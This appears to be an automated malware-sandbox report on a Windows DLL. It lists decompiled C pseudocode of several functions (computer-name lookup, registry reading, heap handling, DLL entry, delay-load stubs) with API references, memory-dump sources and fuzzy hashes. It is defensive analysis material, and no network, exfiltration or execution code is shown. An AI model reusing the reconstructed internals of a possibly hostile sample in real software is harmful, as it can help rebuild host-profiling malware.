                                                                                                                                                                                                                                0x736db8ac
                                                                                                                                                                                                                                0x736db8b0
                                                                                                                                                                                                                                0x736db8b7
                                                                                                                                                                                                                                0x736db8be
                                                                                                                                                                                                                                0x736db8c0
                                                                                                                                                                                                                                0x736db8c3
                                                                                                                                                                                                                                0x736db8c3
                                                                                                                                                                                                                                0x736db890
                                                                                                                                                                                                                                0x736db890
                                                                                                                                                                                                                                0x736db893
                                                                                                                                                                                                                                0x736db899
                                                                                                                                                                                                                                0x736db8a4
                                                                                                                                                                                                                                0x736db8a6
                                                                                                                                                                                                                                0x736db8a6
                                                                                                                                                                                                                                0x736db89b
                                                                                                                                                                                                                                0x736db89b
                                                                                                                                                                                                                                0x736db89b
                                                                                                                                                                                                                                0x736db899
                                                                                                                                                                                                                                0x736db84b
                                                                                                                                                                                                                                0x736db84b
                                                                                                                                                                                                                                0x736db84b
                                                                                                                                                                                                                                0x736db8ca
                                                                                                                                                                                                                                0x736db8cb
                                                                                                                                                                                                                                0x736db8d7

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 736DB870
                                                                                                                                                                                                                                • GetFileType.KERNELBASE(00000000), ref: 736DB882
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileHandleType
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3000768030-0
                                                                                                                                                                                                                                • Opcode ID: 180762a39e811bfde15570bdb5cef4fa404a1308c806c867aa75a54bb6c45fb4
                                                                                                                                                                                                                                • Instruction ID: 347af3f554d3e34fb7bc24a3a5927b8f5158808816bbbbf46e6b1c7be9728709
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 180762a39e811bfde15570bdb5cef4fa404a1308c806c867aa75a54bb6c45fb4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F11D67262475266CF315A3F8E887127AA9AB52231B38071AD0B7C75FDC630D486C651
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A8779A, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A8779A(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E00A863D1(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0xa8d270, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E00A86FA6(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}








                                                                                                                                                                                                                                0x00a8779a
                                                                                                                                                                                                                                0x00a877a2
                                                                                                                                                                                                                                0x00a877b9
                                                                                                                                                                                                                                0x00a877d4
                                                                                                                                                                                                                                0x00a877d8
                                                                                                                                                                                                                                0x00a877dd
                                                                                                                                                                                                                                0x00a877df
                                                                                                                                                                                                                                0x00a877f1
                                                                                                                                                                                                                                0x00a877fd
                                                                                                                                                                                                                                0x00a877e1
                                                                                                                                                                                                                                0x00a877e1
                                                                                                                                                                                                                                0x00a877e6
                                                                                                                                                                                                                                0x00a877eb
                                                                                                                                                                                                                                0x00a877eb
                                                                                                                                                                                                                                0x00a877df
                                                                                                                                                                                                                                0x00a87803
                                                                                                                                                                                                                                0x00a87807
                                                                                                                                                                                                                                0x00a87807
                                                                                                                                                                                                                                0x00a877ae
                                                                                                                                                                                                                                0x00a877b3
                                                                                                                                                                                                                                0x00a877b7
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A86FA6: SysFreeString.OLEAUT32(00000000), ref: 00A87009
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,747DF710,?,00000000,?,00000000,?,00A8296F,?,004F0053,01AE9370,00000000,?), ref: 00A877FD
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Free$HeapString
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3806048269-1536154274
                                                                                                                                                                                                                                • Opcode ID: 1f2d8b23f105c63f046017f15f05721c5c6d6f7d6b9a90e396813d86db6adbe9
                                                                                                                                                                                                                                • Instruction ID: fb6c32c933c864bb70a0451bb9154e012e07fa62dfb892ed328b65a8813edb8c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f2d8b23f105c63f046017f15f05721c5c6d6f7d6b9a90e396813d86db6adbe9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0012832500519BBDB22AF95CC05EEE7BA6EF08790F148029FE089A120D731C960DB90
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A8508C, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                                                                                			E00A8508C(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E00A85157(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E00A853BB(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                                                                                                                                                                                                                0x00a85091
                                                                                                                                                                                                                                0x00a8509c
                                                                                                                                                                                                                                0x00a8509e
                                                                                                                                                                                                                                0x00a850a4
                                                                                                                                                                                                                                0x00a850a6
                                                                                                                                                                                                                                0x00a850ab
                                                                                                                                                                                                                                0x00a850b4
                                                                                                                                                                                                                                0x00a850b8
                                                                                                                                                                                                                                0x00a850c1
                                                                                                                                                                                                                                0x00a850c5
                                                                                                                                                                                                                                0x00a850d4
                                                                                                                                                                                                                                0x00a850c7
                                                                                                                                                                                                                                0x00a850c8
                                                                                                                                                                                                                                0x00a850cd
                                                                                                                                                                                                                                0x00a850cd
                                                                                                                                                                                                                                0x00a850c5
                                                                                                                                                                                                                                0x00a850b8
                                                                                                                                                                                                                                0x00a850dd

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000003,00000000,00A8A5F2,747DF710,00000000,?,?,00A8A5F2), ref: 00A850A4
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000003,00000000,00A8A5F2,00A8A5F3,?,?,00A8A5F2), ref: 00A850C1
                                                                                                                                                                                                                                  • Part of subcall function 00A853BB: RtlFreeHeap.NTDLL(00000000,00000000,00A812FA,00000000,?,?,00000000), ref: 00A853C7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ComputerHeapName$AllocateFree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 187446995-0
                                                                                                                                                                                                                                • Opcode ID: 25bb36bce304b7275b26bd46655b8497e7cc065aaf59b0787e533e275991782d
                                                                                                                                                                                                                                • Instruction ID: 46d2cf082aa8f721f1f2e4f431ccfe63a1699b36b16bf5b4ced38b4a4382caa9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25bb36bce304b7275b26bd46655b8497e7cc065aaf59b0787e533e275991782d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9F03036A00509BFEB11E6AA8D05EAF6ABCDFC5750F210159B904D7140EA70DE069BB1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A8596A, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0xa8d274) == 0) {
						E00A81F47();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0xa8d274) == 1) {
						_t10 = E00A84D07(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                                                                                                                                                                                                                0x00a85971
                                                                                                                                                                                                                                0x00a85972
                                                                                                                                                                                                                                0x00a85975
                                                                                                                                                                                                                                0x00a859a7
                                                                                                                                                                                                                                0x00a859a9
                                                                                                                                                                                                                                0x00a859a9
                                                                                                                                                                                                                                0x00a85977
                                                                                                                                                                                                                                0x00a85978
                                                                                                                                                                                                                                0x00a8598d
                                                                                                                                                                                                                                0x00a85994
                                                                                                                                                                                                                                0x00a85996
                                                                                                                                                                                                                                0x00a85996
                                                                                                                                                                                                                                0x00a85994
                                                                                                                                                                                                                                0x00a85978
                                                                                                                                                                                                                                0x00a859b1

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(00A8D274), ref: 00A8597F
                                                                                                                                                                                                                                  • Part of subcall function 00A84D07: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00A85992,?), ref: 00A84D1A
                                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(00A8D274), ref: 00A8599F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3834848776-0
                                                                                                                                                                                                                                • Opcode ID: 832dc02cc50fee87041a3a9825c8ff99c13c36a0ccaacd4822fce9e75a9b4f64
                                                                                                                                                                                                                                • Instruction ID: 4fcc873de4f7d0d9b724fa19b897f2acfd2a74f4df5a476635f4b2c8897358eb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 832dc02cc50fee87041a3a9825c8ff99c13c36a0ccaacd4822fce9e75a9b4f64
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3EE04F31A44526EBC72277B8DD04B5EB651AB11BB0F124514FC81D1090D620CC42C7B3
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A86FA6, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 34%
                                                                                                                                                                                                                                			E00A86FA6(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0xa8d2e0; // 0x105a5a8
				_t4 = _t15 + 0xa8e39c; // 0x1ae8944
				_t20 = _t4;
				_t6 = _t15 + 0xa8e124; // 0x650047
				_t17 = E00A86B85(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E00A8A3CC(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                                                                                                                                                                                                                0x00a86fb0
                                                                                                                                                                                                                                0x00a86fb7
                                                                                                                                                                                                                                0x00a86fb8
                                                                                                                                                                                                                                0x00a86fb9
                                                                                                                                                                                                                                0x00a86fba
                                                                                                                                                                                                                                0x00a86fc0
                                                                                                                                                                                                                                0x00a86fc5
                                                                                                                                                                                                                                0x00a86fc5
                                                                                                                                                                                                                                0x00a86fcf
                                                                                                                                                                                                                                0x00a86fe1
                                                                                                                                                                                                                                0x00a86fe8
                                                                                                                                                                                                                                0x00a87016
                                                                                                                                                                                                                                0x00a86fea
                                                                                                                                                                                                                                0x00a86fec
                                                                                                                                                                                                                                0x00a86ff1
                                                                                                                                                                                                                                0x00a87013
                                                                                                                                                                                                                                0x00a86ff3
                                                                                                                                                                                                                                0x00a86ff6
                                                                                                                                                                                                                                0x00a86ffd
                                                                                                                                                                                                                                0x00a87002
                                                                                                                                                                                                                                0x00a87004
                                                                                                                                                                                                                                0x00a87004
                                                                                                                                                                                                                                0x00a87009
                                                                                                                                                                                                                                0x00a87009
                                                                                                                                                                                                                                0x00a86ff1
                                                                                                                                                                                                                                0x00a8701d

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A86B85: SysFreeString.OLEAUT32(?), ref: 00A86C64
                                                                                                                                                                                                                                  • Part of subcall function 00A8A3CC: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00A81CB7,004F0053,00000000,?), ref: 00A8A3D5
                                                                                                                                                                                                                                  • Part of subcall function 00A8A3CC: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00A81CB7,004F0053,00000000,?), ref: 00A8A3FF
                                                                                                                                                                                                                                  • Part of subcall function 00A8A3CC: memset.NTDLL ref: 00A8A413
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A87009
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeString$lstrlenmemcpymemset
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 397948122-0
                                                                                                                                                                                                                                • Opcode ID: 39d716dc9c71c4c95f800f89bf83df047f6d6d691efd0518c4ebb49f7161af10
                                                                                                                                                                                                                                • Instruction ID: eb58f6bf8195a600751cde97b7e51257290d7b858ff039fb356955edcfa45614
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39d716dc9c71c4c95f800f89bf83df047f6d6d691efd0518c4ebb49f7161af10
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A019E32500019BFDB12EFA8CD04DAEBBB8EB08360B100425F941E7061E770D91197A1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A8AA84, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A8AA84() {

				E00A8ABE6(0xa8c2c4, 0xa8d0f0); // executed
				goto __eax;
			}



                                                                                                                                                                                                                                0x00a8aa3f
                                                                                                                                                                                                                                0x00a8aa46

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00A8AA3F
                                                                                                                                                                                                                                  • Part of subcall function 00A8ABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A8AC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                • Opcode ID: 69238618f1e1b2bbda8d20cc19fa0ce533be9f956d8cb9095b8dc79a1829b14a
                                                                                                                                                                                                                                • Instruction ID: 37fcfc200f5cfe2bfb6a42dd05991d71ba93c3c9cddeb2abb3f8811b04dd2d68
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69238618f1e1b2bbda8d20cc19fa0ce533be9f956d8cb9095b8dc79a1829b14a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7EB012A225C0017D3108F2445E16F37022CE0D0B20330841BF001C11C0E4402C050333
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A8AA2D, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A8AA2D() {

				E00A8ABE6(0xa8c2c4, 0xa8d110); // executed
				goto __eax;
			}



                                                                                                                                                                                                                                0x00a8aa3f
                                                                                                                                                                                                                                0x00a8aa46

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00A8AA3F
                                                                                                                                                                                                                                  • Part of subcall function 00A8ABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A8AC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                • Opcode ID: d113e4523dad9eeab9310854d10e796b597997a3e005658709de764b3b3fb572
                                                                                                                                                                                                                                • Instruction ID: a69212896d672f4936b1faf5d8c017f65e71a3e330259e05db3b32a1fd4b1c50
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d113e4523dad9eeab9310854d10e796b597997a3e005658709de764b3b3fb572
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39B012A265C0017D3118B2405E0BC37021CE4E0F60730891FF040C00C0E4402C040333
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A8AA66, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A8AA66() {

				E00A8ABE6(0xa8c2c4, 0xa8d0fc); // executed
				goto __eax;
			}



                                                                                                                                                                                                                                0x00a8aa3f
                                                                                                                                                                                                                                0x00a8aa46

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00A8AA3F
                                                                                                                                                                                                                                  • Part of subcall function 00A8ABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A8AC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                • Opcode ID: ad3732cdee1db5c52144a55de9924b5df0d4e1fae1078399d1f57ea2352275ea
                                                                                                                                                                                                                                • Instruction ID: 28c6259f477761ce9dd0dc15e8acebe1c7693b42fedae95184603a5dc8148b8b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad3732cdee1db5c52144a55de9924b5df0d4e1fae1078399d1f57ea2352275ea
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4EB012A225C001BD3108F2445E17D37022CD0D0B20330C41BF401C15C0E4402C050333
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A8AA7A, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A8AA7A() {

				E00A8ABE6(0xa8c2c4, 0xa8d0f4); // executed
				goto __eax;
			}



                                                                                                                                                                                                                                0x00a8aa3f
                                                                                                                                                                                                                                0x00a8aa46

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00A8AA3F
                                                                                                                                                                                                                                  • Part of subcall function 00A8ABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A8AC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                • Opcode ID: 28af645af24d8cfec3b141bf516f27355f684d7d205626360c0250d07d501aef
                                                                                                                                                                                                                                • Instruction ID: 0a037ce73c7751896671b27c40725c2d0fcc0c7fdc4c08373bb57b3038f69a02
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28af645af24d8cfec3b141bf516f27355f684d7d205626360c0250d07d501aef
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EAB012A225C0017D3108F2445F16D37022CD0D0B20330C41BF401C51C0E4406C060333
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A8AA70, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A8AA70() {

				E00A8ABE6(0xa8c2c4, 0xa8d0f8); // executed
				goto __eax;
			}



                                                                                                                                                                                                                                0x00a8aa3f
                                                                                                                                                                                                                                0x00a8aa46

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00A8AA3F
                                                                                                                                                                                                                                  • Part of subcall function 00A8ABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A8AC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                • Opcode ID: e64f109e12db07d247c608859121e95d8effb80f6b0f6914188ff674dce4c573
                                                                                                                                                                                                                                • Instruction ID: dcc03e3d81203852f3ff93ba014f42dbd34940deb3d53b32b77266be28d282d4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e64f109e12db07d247c608859121e95d8effb80f6b0f6914188ff674dce4c573
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FB012E225C1017D3208F2445E16D77022CD0D0B30330851BF001C11C0E4402C491333
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A8AA48, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A8AA48() {

				E00A8ABE6(0xa8c2c4, 0xa8d108); // executed
				goto __eax;
			}



